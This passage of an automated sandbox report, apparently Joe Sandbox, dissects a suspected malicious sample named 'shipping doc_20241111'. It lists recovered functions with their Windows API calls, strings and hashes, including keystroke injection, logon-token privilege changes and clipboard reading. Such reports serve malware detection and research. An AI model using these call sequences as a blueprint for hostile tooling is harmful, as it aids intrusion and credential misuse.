Function 015AA5E4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 015AA5F9

Memory Dump Source

Source File: 00000000.00000002.1670471404.00000000015A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15a8000_shipping doc_20241111.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 999c41935ace2a1b48098804dbef8b04f31edcee7f19889a7ea00bc82b68cfe5
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: B4E09A7498010DAFDB00DFA4D54969D7BB4EF04301F1005A1FD0597681DA309A548A66

Function 00F47BEE Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,00F8306C), ref: 00F47C0E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: a800567528bf75cc2dc79e261af03c642b49c56a54062eefe33a9626c20c3e2a
Instruction ID: 764e844f035ac053863bacea70df02321f4e6d3fc4f1d4dfce6a5e3b34555ab1
Opcode Fuzzy Hash: a800567528bf75cc2dc79e261af03c642b49c56a54062eefe33a9626c20c3e2a
Instruction Fuzzy Hash: 0BE09275944B42CED7315F1AE804412FBE8FFE17613204A2ED4E582664E7B06886EB90

Function 015AA5E8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 015AA5F9

Memory Dump Source

Source File: 00000000.00000002.1670471404.00000000015A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15a8000_shipping doc_20241111.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 22a5b2865c8001cba7a1a41b548638b79b6353a24d833c4124bc5bc9e27dc9c1
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 5BE0BF7498010D9FDB00DFA4D54969D7BB4EF04301F100161FD0193281D63099508A62

Non-executed Functions

Function 00FD9468 Relevance: 72.4, APIs: 39, Strings: 2, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5B021: GetWindowLongW.USER32(?,000000EB), ref: 00F5B032

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00FD950C
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FD954D
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00FD9591
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FD95BB
SendMessageW.USER32 ref: 00FD95E4
GetKeyState.USER32(00000011), ref: 00FD967D
GetKeyState.USER32(00000009), ref: 00FD968A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00FD96A0
GetKeyState.USER32(00000010), ref: 00FD96AA
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00FD96DB
SendMessageW.USER32 ref: 00FD9702
SendMessageW.USER32(?,00001030,?,00FD7D85), ref: 00FD980A
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00FD9820
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00FD9833
SetCapture.USER32(?), ref: 00FD983C
ClientToScreen.USER32(?,?), ref: 00FD98A1
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00FD98AE
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00FD98C8
ReleaseCapture.USER32 ref: 00FD98D3
GetCursorPos.USER32(?), ref: 00FD990B
ScreenToClient.USER32(?,?), ref: 00FD9918
SendMessageW.USER32(?,00001012,00000000,?), ref: 00FD9972
SendMessageW.USER32 ref: 00FD99A0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00FD99DD
SendMessageW.USER32 ref: 00FD9A0C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00FD9A2D
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00FD9A3C
GetCursorPos.USER32(?), ref: 00FD9A5A
ScreenToClient.USER32(?,?), ref: 00FD9A67
GetParent.USER32(?), ref: 00FD9A85
SendMessageW.USER32(?,00001012,00000000,?), ref: 00FD9AEC
SendMessageW.USER32 ref: 00FD9B1D
ClientToScreen.USER32(?,?), ref: 00FD9B76
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00FD9BA6
SendMessageW.USER32(?,00001111,00000000,?), ref: 00FD9BD0
SendMessageW.USER32 ref: 00FD9BF3
ClientToScreen.USER32(?,?), ref: 00FD9C40
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00FD9C74

Part of subcall function 00F5ADC4: GetWindowLongW.USER32(?,000000EB), ref: 00F5ADD2

GetWindowLongW.USER32(?,000000F0), ref: 00FD9CF7

Strings

@GUI_DRAGID, xrefs: 00FD986F
F, xrefs: 00FD9BF9

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F
API String ID: 3429851547-4164748364
Opcode ID: 967d44997ec2392df23f96d575ef0b43ccccb79e33b677d7b6245ad790ea0b50
Instruction ID: ad5331a62269175a0e93bb875e301841d11c8550f97760ecf212c3a8e8309a24
Opcode Fuzzy Hash: 967d44997ec2392df23f96d575ef0b43ccccb79e33b677d7b6245ad790ea0b50
Instruction Fuzzy Hash: 4B42B630509201AFDB25CF64D844BAABBE6FF49320F18461AF699873A0C7B5D950EF81

Function 00FD47A8 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 00FD4828
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00FD483D
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00FD485C
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 00FD4880
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 00FD4891
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 00FD48B0
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 00FD48E3
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 00FD4909
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00FD4944
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00FD498B
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00FD49B3
IsMenu.USER32(?), ref: 00FD49CC
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FD4A27
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FD4A55
GetWindowLongW.USER32(?,000000F0), ref: 00FD4AC9
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00FD4B18
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00FD4BB7
wsprintfW.USER32 ref: 00FD4BE3
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FD4BFE
GetWindowTextW.USER32(?,00000000,00000001), ref: 00FD4C26
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FD4C48
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FD4C68
GetWindowTextW.USER32(?,00000000,00000001), ref: 00FD4C8F

Strings

%d/%02d/%02d, xrefs: 00FD4BDD

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: e2c1c670ce01e18073d924922dbdee28d77d93fa7de5b12826fedf9c284e3ee3
Instruction ID: af4a108bc55fd371491c208d0c6e64fb34820d5f34fe8fd1d68445b76742a504
Opcode Fuzzy Hash: e2c1c670ce01e18073d924922dbdee28d77d93fa7de5b12826fedf9c284e3ee3
Instruction Fuzzy Hash: 1F120371900248ABEB259F74CC49FAE7BBAEF45320F18411AF919DB3D0DB74A941EB50

Function 00F5EFAD Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131threadkeyboardwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00F5EFB7
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F5EFD4
IsIconic.USER32(00000000), ref: 00F5EFDD
SetForegroundWindow.USER32(00000000), ref: 00F5EFEF
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F5F005
GetCurrentThreadId.KERNEL32 ref: 00F5F00C
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F5F018
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F5F029
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F5F031
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00F5F039
SetForegroundWindow.USER32(00000000), ref: 00F5F03C
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F055
keybd_event.USER32(00000012,00000000), ref: 00F5F060
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F06A
keybd_event.USER32(00000012,00000000), ref: 00F5F06F
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F078
keybd_event.USER32(00000012,00000000), ref: 00F5F07D
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F5F087
keybd_event.USER32(00000012,00000000), ref: 00F5F08C
SetForegroundWindow.USER32(00000000), ref: 00F5F08F
AttachThreadInput.USER32(?,000000FF,00000000), ref: 00F5F0AD
AttachThreadInput.USER32(?,00000000,00000000), ref: 00F5F0B5
AttachThreadInput.USER32(00000000,000000FF,00000000), ref: 00F5F0BD

Strings

Shell_TrayWnd, xrefs: 00F5EFCF

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconic
String ID: Shell_TrayWnd
API String ID: 1155518417-2988720461
Opcode ID: ff0a823fec3de969e67ca9809c5f8839060a50dce6566371283d49147bb322eb
Instruction ID: a4985e71b045d3025a7207fcd206f802084037f99c36303cc523b1b8c78526b3
Opcode Fuzzy Hash: ff0a823fec3de969e67ca9809c5f8839060a50dce6566371283d49147bb322eb
Instruction Fuzzy Hash: 38315072A4021DBAEB202BB59C4AFBF7F6DEB44B51F140066FB05E61D1C6B15D04FAA0

Function 00FA1145 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 00FA1607: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FA1651
Part of subcall function 00FA1607: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FA167E
Part of subcall function 00FA1607: GetLastError.KERNEL32 ref: 00FA168E

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00FA11CA
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00FA11EC
CloseHandle.KERNEL32(?), ref: 00FA11FD
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FA1215
GetProcessWindowStation.USER32 ref: 00FA122E
SetProcessWindowStation.USER32(00000000), ref: 00FA1238
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FA1254

Part of subcall function 00FA1003: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FA1140), ref: 00FA1018
Part of subcall function 00FA1003: CloseHandle.KERNEL32(?,?,00FA1140), ref: 00FA102D

Strings

default, xrefs: 00FA124F
, xrefs: 00FA119E
winsta0, xrefs: 00FA1210

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0
API String ID: 22674027-1027155976
Opcode ID: 4815713957b5aa5abb6afc453024f5a7f7eec23c8871ed409d8694bdae406c2e
Instruction ID: 6c6473f14e4cfc78e97c666f20dfd85aea66c98a411a8b56ec714c92ed167917
Opcode Fuzzy Hash: 4815713957b5aa5abb6afc453024f5a7f7eec23c8871ed409d8694bdae406c2e
Instruction Fuzzy Hash: 57819DB1900309AFDF219FA4DC49BEE7BB9FF06310F05416AF914E62A0C7358A45EB64

Function 00FA0AA6 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FA103D: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FA1058
Part of subcall function 00FA103D: GetLastError.KERNEL32(?,00000000,00000000,?,?,00FA0ADF,?,?,?), ref: 00FA1064
Part of subcall function 00FA103D: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00FA0ADF,?,?,?), ref: 00FA1073
Part of subcall function 00FA103D: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00FA0ADF,?,?,?), ref: 00FA107A
Part of subcall function 00FA103D: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FA1091

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FA0B10
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FA0B44
GetLengthSid.ADVAPI32(?), ref: 00FA0B5B
GetAce.ADVAPI32(?,00000000,?), ref: 00FA0B95
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FA0BB1
GetLengthSid.ADVAPI32(?), ref: 00FA0BC8
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00FA0BD0
HeapAlloc.KERNEL32(00000000), ref: 00FA0BD7
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FA0BF8
CopySid.ADVAPI32(00000000), ref: 00FA0BFF
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FA0C2E
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FA0C50
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FA0C62
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA0C89
HeapFree.KERNEL32(00000000), ref: 00FA0C90
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA0C99
HeapFree.KERNEL32(00000000), ref: 00FA0CA0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FA0CA9
HeapFree.KERNEL32(00000000), ref: 00FA0CB0
GetProcessHeap.KERNEL32(00000000,?), ref: 00FA0CBC
HeapFree.KERNEL32(00000000), ref: 00FA0CC3

Part of subcall function 00FA10D7: GetProcessHeap.KERNEL32(00000008,00FA0AF5,?,00000000,?,00FA0AF5,?), ref: 00FA10E5
Part of subcall function 00FA10D7: HeapAlloc.KERNEL32(00000000,?,00000000,?,00FA0AF5,?), ref: 00FA10EC
Part of subcall function 00FA10D7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00FA0AF5,?), ref: 00FA10FB

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 1fcf87e1508134f005ef927a3cd2af608f5e69597d8627f3480c3058e667b487
Instruction ID: fd32088fa4c4052351056753268bc47362fb9d0489284e24ce9e70d3ac8dd873
Opcode Fuzzy Hash: 1fcf87e1508134f005ef927a3cd2af608f5e69597d8627f3480c3058e667b487
Instruction Fuzzy Hash: D87170B1D0121ABBDF10DFA5EC48FAEBBB9BF05360F044215E915E7191DB709904DBA0

Function 00FBEA26 Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00FDD0D0), ref: 00FBEA50
IsClipboardFormatAvailable.USER32(0000000D), ref: 00FBEA5E
GetClipboardData.USER32(0000000D), ref: 00FBEA6A
CloseClipboard.USER32 ref: 00FBEA76
GlobalLock.KERNEL32(00000000), ref: 00FBEAAE
CloseClipboard.USER32 ref: 00FBEAB8
GlobalUnlock.KERNEL32(00000000), ref: 00FBEAE3
IsClipboardFormatAvailable.USER32(00000001), ref: 00FBEAF0
GetClipboardData.USER32(00000001), ref: 00FBEAF8
GlobalLock.KERNEL32(00000000), ref: 00FBEB09
GlobalUnlock.KERNEL32(00000000), ref: 00FBEB49
IsClipboardFormatAvailable.USER32(0000000F), ref: 00FBEB5F
GetClipboardData.USER32(0000000F), ref: 00FBEB6B
GlobalLock.KERNEL32(00000000), ref: 00FBEB7C
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00FBEB9E
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00FBEBBB
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00FBEBF9
GlobalUnlock.KERNEL32(00000000), ref: 00FBEC1A
CountClipboardFormats.USER32 ref: 00FBEC3B
CloseClipboard.USER32 ref: 00FBEC80

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 34459a44356dd80b47fe52604cb4bcfd41e8cc86096276fe9be10311b5c4e864
Instruction ID: 7b37bc82ad06595ab3369ac7b3fdbda26fb310b4e47b69e16d0a01380413ec06
Opcode Fuzzy Hash: 34459a44356dd80b47fe52604cb4bcfd41e8cc86096276fe9be10311b5c4e864
Instruction Fuzzy Hash: AA61FE312043069FD310EF21CC84FAABBA9EF84714F04851AF846872A2CB75DD05EFA2

Function 00FB68AD Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00FB68DC
FindClose.KERNEL32(00000000), ref: 00FB6930
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FB696C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FB6993

Part of subcall function 00F4B606: _wcslen.LIBCMT ref: 00F4B610

FileTimeToSystemTime.KERNEL32(?,?), ref: 00FB69D0
FileTimeToSystemTime.KERNEL32(?,?), ref: 00FB69FD

Strings

%4d, xrefs: 00FB6ACF
%03d, xrefs: 00FB6CC0
%4d%02d%02d%02d%02d%02d%03d, xrefs: 00FB6A50
%02d, xrefs: 00FB6B1E, 00FB6B28, 00FB6B78, 00FB6BC8, 00FB6C18, 00FB6C68
%4d%02d%02d%02d%02d%02d, xrefs: 00FB6A88

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: d8d82f63eeb84967d0baf1521c3163596fb36fb47da98477bb76c8c6edac5181
Instruction ID: 52dc4b65db39b058ccbaa909316a5dfc73ca63769b4c93e1feff7c22f144d0ef
Opcode Fuzzy Hash: d8d82f63eeb84967d0baf1521c3163596fb36fb47da98477bb76c8c6edac5181
Instruction Fuzzy Hash: 9CD152725083049EC710EF65CC81EAFBBECAF88704F04491EF985D6191EB79DA49DB62

Function 00FB9560 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00FB9581
GetFileAttributesW.KERNEL32(?), ref: 00FB95BF
SetFileAttributesW.KERNEL32(?,?), ref: 00FB95D9
FindNextFileW.KERNEL32(00000000,?), ref: 00FB95F1
FindClose.KERNEL32(00000000), ref: 00FB95FC
FindFirstFileW.KERNEL32(*.*,?), ref: 00FB9618
SetCurrentDirectoryW.KERNEL32(?), ref: 00FB9668
SetCurrentDirectoryW.KERNEL32(01006B80), ref: 00FB9686
FindNextFileW.KERNEL32(00000000,00000010), ref: 00FB9690
FindClose.KERNEL32(00000000), ref: 00FB969D
FindClose.KERNEL32(00000000), ref: 00FB96AD

Strings

*.*, xrefs: 00FB9613

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: df9a7e3fd02757ea9064c38469aa683e4d9244c2e0819e215861ac148721788d
Instruction ID: 9dad0e934eaa4b6dba688f07472b52c77b38b3c30f54b6cfd3dd2e2ca7916499
Opcode Fuzzy Hash: df9a7e3fd02757ea9064c38469aa683e4d9244c2e0819e215861ac148721788d
Instruction Fuzzy Hash: AE31F372A0560E6BDB20AFB6DC48ADE33AE9F45330F144156E954E3090EBB5DA84EE50

Function 00F5B728 Relevance: 19.6, Strings: 15, Instructions: 881COMMON

Download Yara Rule

Strings

BSR_UNICODE), xrefs: 00F98968
NO_AUTO_POSSESS), xrefs: 00F98756
LIMIT_RECURSION=, xrefs: 00F98833
_______________________________________________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvw, xrefs: 00F98979
UCP), xrefs: 00F98735
UTF16), xrefs: 00F986F7
LF), xrefs: 00F988D2
CR), xrefs: 00F988B5
ANYCRLF), xrefs: 00F98929
ANY), xrefs: 00F9890C
BSR_ANYCRLF), xrefs: 00F9894E
NO_START_OPT), xrefs: 00F98777
CRLF), xrefs: 00F988EF
LIMIT_MATCH=, xrefs: 00F98798
UTF), xrefs: 00F98722

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$_______________________________________________________________________________________________________________________________________________________________abccccccccdeefghijklmnopqrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvwxrstuvw
API String ID: 0-523715327
Opcode ID: 045a98b54b9ed96f8317ed65e7f906b8fb80dfb940b420ce9246c952db0e41af
Instruction ID: c1ca4ee539a45829a5919e09d59b56a67d9dfc58904594faf2f0268062152f76
Opcode Fuzzy Hash: 045a98b54b9ed96f8317ed65e7f906b8fb80dfb940b420ce9246c952db0e41af
